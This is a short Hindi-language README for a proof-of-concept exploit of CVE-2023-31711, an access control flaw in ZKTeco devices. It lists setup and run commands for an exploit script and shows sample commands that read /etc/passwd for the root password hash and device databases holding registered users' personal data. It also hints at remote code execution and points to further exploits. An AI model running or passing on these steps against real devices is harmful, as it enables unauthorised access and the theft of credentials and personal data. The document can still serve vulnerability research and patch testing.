CVE-2023-31711
ZKTECO में गलत पहुँच नियंत्रण दूरस्थ हमलावरों को प्रशासनिक API के माध्यम से किसी भी फ़ाइल को पढ़ने की अनुमति देता है।
आवश्यक मॉड्यूल स्थापित करना
- ZKTEco निर्देशिका के अंदर:
$ pip install -r ./pyzatt/requirements_dev.txt
एक्सप्लॉयट चलाना
- ZKTEco निर्देशिका के अंदर:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
उदाहरण:
get_file /etc/passwd: रूट पासवर्ड का हैश प्रकट होता है
get_file /mnt/mtdblock/data/ZKDB.db: पंजीकृत उपयोगकर्ताओं की PII प्रकट होती है। सामग्री पढ़ने के लिए, आपको इस कमांड को क्रमिक रूप से कई बार चलाने की आवश्यकता हो सकती है जब तक कि पूरी सामग्री
प्रकट न हो जाए
get_file /mnt/mtdblock/data/ZKSystem.db: सिस्टम से संबंधित संवेदनशील जानकारी प्रकट होती है
क्रेडिट्स
नोट
डिवाइस प्रशासनिक API के उपयोग के माध्यम से रिमोट कोड निष्पादन के लिए भी संभावित रूप से असुरक्षित हो सकते हैं। क्रेडिट्स अनुभाग में उल्लिखित एक्सप्लॉयट इसके लिए परीक्षण खोजने का एक अच्छा स्थान हो सकता है।